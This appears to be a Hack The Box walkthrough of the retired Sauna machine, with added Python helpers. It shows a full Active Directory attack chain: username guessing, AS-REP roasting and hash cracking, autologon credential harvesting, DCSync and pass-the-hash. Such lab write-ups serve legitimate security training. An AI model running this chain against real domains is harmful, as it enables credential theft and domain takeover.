HTB (Hack The Box) is an excellent platform that hosts machines running several different operating systems, along with other challenge categories. Individuals have to solve a puzzle (simple enumeration plus a small pentest) in order to log into the platform and download the VPN pack used to connect to the machines hosted on HTB. Note: only write-ups of retired HTB machines are allowed. The machine in this article, Sauna, is retired. Let's start with this machine.

The walkthrough

Download the VPN pack for your user and follow the guidelines to connect to the HTB VPN. The "Sauna" machine IP is 10.10.10.175. We will follow our usual penetration-testing methodology, starting with enumeration in order to gather as much information about the machine as possible. As usual, the first step is an nmap scan to identify the services running on the host: «nmap -sC -sV -oA Sauna 10.10.10.175»

Port 80 is open, and the site shown below is deployed on it.

Enumerating the site, we find a page that lists the team members by name.

Moving on with enumeration: since port 389 (LDAP) also appeared in the nmap results, let's use nmap's LDAP scripts to see what can be enumerated anonymously.

At the end of the output, one name matches the team-member list: "Hugo Smith." To enumerate further we need to know the exact username of this account, so below are some common username schemas based on the naming conventions I have seen.

Using that list as input to Impacket's GetNPUsers, we got a valid assertion on hsmith: the KDC recognises the account (GetNPUsers reports that the user does not have UF_DONT_REQUIRE_PREAUTH set, whereas an unknown user produces a KDC_ERR_C_PRINCIPAL_UNKNOWN error). That tells us the internal naming convention is the first letter of the first name followed by the last name.

Following the same convention, build the appropriate list for the remaining team members as shown below:

Then use it as input to GetNPUsers again. This time we got an AS-REP hash for fsmith, an account with Kerberos pre-authentication disabled.

Below, we extract that hash and feed it to hashcat (mode 18200 for the $krb5asrep$23$ format). Hashcat cracked the password successfully.
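The enumeration steps above (building username candidates from the displayed names, confirming the convention from GetNPUsers' responses, then rebuilding the list and picking the hashcat mode for the AS-REP hash) as one worked example. This is added here and is not code from the original write-up or from Impacket; the second team-member name, the domain name and the hash bytes in the sample output are constructed placeholders, and the GetNPUsers invocation in the usage note assumes the usual `-usersfile`/`-no-pass`/`-dc-ip` options.

```python
#!/usr/bin/env python3
"""Username-schema candidates and GetNPUsers result triage.

Added example for the Sauna enumeration step; not code from the original
write-up. Names other than "Hugo Smith"/"hsmith"/"fsmith", the domain and
the hash bytes below are constructed for illustration.
"""
import re

# Common Active Directory username conventions, keyed by a short label.
SCHEMAS = {
    "flast":      lambda f, l: f[0] + l,        # hsmith
    "first.last": lambda f, l: f"{f}.{l}",      # hugo.smith
    "firstlast":  lambda f, l: f + l,           # hugosmith
    "first_last": lambda f, l: f"{f}_{l}",      # hugo_smith
    "f.last":     lambda f, l: f"{f[0]}.{l}",   # h.smith
    "lastf":      lambda f, l: l + f[0],        # smithh
    "last.first": lambda f, l: f"{l}.{f}",      # smith.hugo
    "first":      lambda f, l: f,               # hugo
    "last":       lambda f, l: l,               # smith
}


def _split(full_name):
    """'Hugo Smith' -> ('hugo', 'smith'); middle names are dropped."""
    parts = full_name.lower().split()
    return parts[0], parts[-1]


def candidates(names, schemas=SCHEMAS):
    """Every schema applied to every name, de-duplicated, order preserved.
    This is the first-pass list fed to GetNPUsers to discover which
    convention the domain uses."""
    seen, out = set(), []
    for name in names:
        first, last = _split(name)
        for build in schemas.values():
            user = build(first, last)
            if user not in seen:
                seen.add(user)
                out.append(user)
    return out


def apply_schema(names, schema):
    """Once one schema is confirmed (hsmith -> 'flast'), rebuild the list
    with that schema only."""
    return [SCHEMAS[schema](*_split(n)) for n in names]


# Recognisable lines in Impacket GetNPUsers.py output:
#   - a valid account with pre-auth enforced (named in the line)
#   - an AS-REP hash for an account with pre-auth disabled
# Unknown accounts produce a KDC_ERR_C_PRINCIPAL_UNKNOWN error line that
# does not name the user, so those are only counted.
_PREAUTH_RE = re.compile(r"User (\S+) doesn't have UF_DONT_REQUIRE_PREAUTH set")
_ASREP_RE = re.compile(r"^\$krb5asrep\$(\d+)\$([^@]+)@")
_UNKNOWN = "KDC_ERR_C_PRINCIPAL_UNKNOWN"


def triage(output):
    """Classify GetNPUsers output into valid users, roastable users
    (with their hash line) and the number of unknown principals."""
    result = {"valid": [], "asrep": {}, "unknown": 0}
    for line in output.splitlines():
        m = _PREAUTH_RE.search(line)
        if m:
            result["valid"].append(m.group(1))
            continue
        m = _ASREP_RE.match(line)
        if m:
            result["asrep"][m.group(2)] = line
            result["valid"].append(m.group(2))
            continue
        if _UNKNOWN in line:
            result["unknown"] += 1
    return result


def hashcat_mode(hash_line):
    """hashcat mode for an AS-REP hash: etype 23 (RC4-HMAC) is mode 18200."""
    m = _ASREP_RE.match(hash_line)
    if m and m.group(1) == "23":
        return 18200
    raise ValueError("unrecognised AS-REP hash format")


# Constructed sample output (domain and hash bytes are placeholders).
SAMPLE_OUTPUT = """\
[-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$fsmith@EXAMPLE.LOCAL:0123456789abcdef0123456789abcdef$00112233445566778899aabbccddeeff
"""

if __name__ == "__main__":
    team = ["Hugo Smith", "Alice Example"]   # second name is constructed
    print("\n".join(candidates(team)))       # first-pass list for GetNPUsers
    print(apply_schema(team, "flast"))       # ['hsmith', 'aexample']
    t = triage(SAMPLE_OUTPUT)
    for user, h in t["asrep"].items():
        print(user, "-> hashcat -m", hashcat_mode(h))
```

Write the first-pass list to a file and run it through `GetNPUsers.py '<domain>/' -usersfile users.txt -no-pass -dc-ip 10.10.10.175` (domain name assumed; it is whatever LDAP reported). Only the hash line is worth keeping for hashcat; the "doesn't have UF_DONT_REQUIRE_PREAUTH set" lines are still valuable because they confirm which candidates are real accounts.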

Now let's use evil-winrm to log in with these credentials. As shown below, the login succeeds.

Let's grab the user.txt file. To escalate privileges further, let's upload some well-known enumeration tools such as PowerUp.

Running PowerUp did not reveal anything useful apart from a DLL injection finding that turned out to be a false positive.

Let's try another tool, winPEAS, and check whether it reports anything more.

winPEAS found autologon credentials (a default username and password) stored under the Winlogon registry key.

PowerUp missed this because its autologon check (Get-RegistryAutoLogon) only reports the DefaultUserName and DefaultPassword values when the AutoAdminLogon value is set, and that value is not present here.
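To make the difference between the two tools concrete, here is an added example (not code from the write-up, PowerUp or winPEAS) that parses the text printed by `reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"` in an evil-winrm session and applies both decision rules: report only when AutoAdminLogon is set and non-zero (my reading of PowerUp's Get-RegistryAutoLogon) versus report whenever DefaultUserName/DefaultPassword exist (winPEAS). The registry snapshot is constructed; the domain, account name and password are placeholders, not the real machine's values.

```python
#!/usr/bin/env python3
r"""Winlogon autologon triage from `reg query` output.

Added example; not code from the write-up or from PowerUp/winPEAS. The
snapshot below is constructed: the domain, user and password are
placeholders, not the values found on the machine.
"""
import re

WINLOGON_SAMPLE = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoRestartShell    REG_DWORD    0x1
    DefaultDomainName    REG_SZ    EXAMPLE
    DefaultUserName    REG_SZ    EXAMPLE\svc_example
    DefaultPassword    REG_SZ    NotTheRealPassword1!
    Shell    REG_SZ    explorer.exe
"""

# One value per line: "<name>    <REG_type>    <data>", indented.
_VALUE_RE = re.compile(r"^\s+(\S+)\s+(REG_\w+)\s+(.*)$")


def parse_reg_query(text):
    """Return {value_name: (type, data)} from `reg query` output."""
    values = {}
    for line in text.splitlines():
        m = _VALUE_RE.match(line)
        if m:
            values[m.group(1)] = (m.group(2), m.group(3).strip())
    return values


def autologon_enabled(values):
    """AutoAdminLogon is a REG_SZ '1' when autologon is on. A missing
    value, '0' or an empty string is treated as off."""
    _, data = values.get("AutoAdminLogon", ("REG_SZ", "0"))
    return data.strip() not in ("", "0")


def _creds(values):
    """Default credentials, or None if either half is missing."""
    user = values.get("DefaultUserName", (None, None))[1]
    password = values.get("DefaultPassword", (None, None))[1]
    if user and password:
        return {"domain": values.get("DefaultDomainName", (None, ""))[1],
                "user": user, "password": password}
    return None


def powerup_style(values):
    """PowerUp-style rule (assumption based on Get-RegistryAutoLogon):
    only report when AutoAdminLogon is present and non-zero."""
    if not autologon_enabled(values):
        return None
    return _creds(values)


def winpeas_style(values):
    """winPEAS-style rule: report the default credentials whenever the
    DefaultUserName/DefaultPassword values exist."""
    return _creds(values)


if __name__ == "__main__":
    v = parse_reg_query(WINLOGON_SAMPLE)
    print("PowerUp-style:", powerup_style(v))   # None: AutoAdminLogon absent
    print("winPEAS-style:", winpeas_style(v))   # credentials reported
```

The practical lesson is the one the box teaches: when one tool is quiet, check the raw registry values yourself rather than trusting a single tool's heuristic.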

With these new credentials, we can use Impacket's secretsdump against the domain controller, and it returns the Administrator account's NTLM hash. Run remotely against a DC, secretsdump pulls domain hashes over the DRSUAPI replication interface (DCSync), so this only works because the service account holds the required replication rights.

Using evil-winrm again, this time passing the Administrator NTLM hash with the -H option (pass-the-hash), we log in and grab the root flag.

So, this was a good machine, and the initial user enumeration holds the key to this box: deriving the naming convention from the public team page and confirming it with GetNPUsers. After that, escalating privileges was a matter of running the standard tools and reading their output carefully. We will continue this series with many more examples of interesting HTB machines.